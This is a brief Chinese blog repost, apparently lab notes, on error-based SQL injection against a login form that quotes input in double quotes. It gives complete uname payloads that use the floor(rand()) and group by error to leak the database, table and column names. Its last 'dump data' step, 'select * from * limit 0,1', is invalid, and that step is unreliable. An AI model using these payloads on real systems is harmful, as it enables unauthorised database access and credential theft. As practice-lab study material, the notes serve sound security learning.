标签:amp group by uname syntax 数据 ase form format 双引号
一、报错分析
riaDBserverversionfortherightsyntaxtousenear‘))"andpassword=""LIMIT0,1‘atline1
syntaxtousenear‘"""andpassword=""LIMIT0,1‘atline1
基于双引号
二、分析类型。
万能登录成功
三、没有回显位。
估计应该是基于错误的注释。
1、正确答案(勿改动)数据库名
uname=123" and (select 1 from (select count(*),(concat("~",database(),"~",floor(rand()*2)))name from information_schema.tables group by name)b) #&passwd=&submit=Submit
1、语句分析:
mysql CONCAT()函数用于将多个字符串连接成一个字符串,是最重要的mysql函数之一
(concat("~",database(),"~",floor(rand()*2))):产生报错信息
细节决定成败
2、暴表明
database===(select table_name from information_schema.tables where table_schema=0x7365637572697479 limit 0,1)
3、暴子端
uname=123" and (select 1 from (select count(*),(concat("~",(select column_name from information_schema.columns where table_name=0x7573657273 limit 0,1),"~",floor(rand()*2)))name from information_schema.tables group by name)b) #&passwd=&submit=Submit
(concat("~",(select column_name from information_schema.columns where table_name=0x7573657273 limit 0,1)
4 暴数据
select * from * limit 0,1
标签:amp group by uname syntax 数据 ase form format 双引号
原文地址:https://www.cnblogs.com/123xu/p/9016807.html
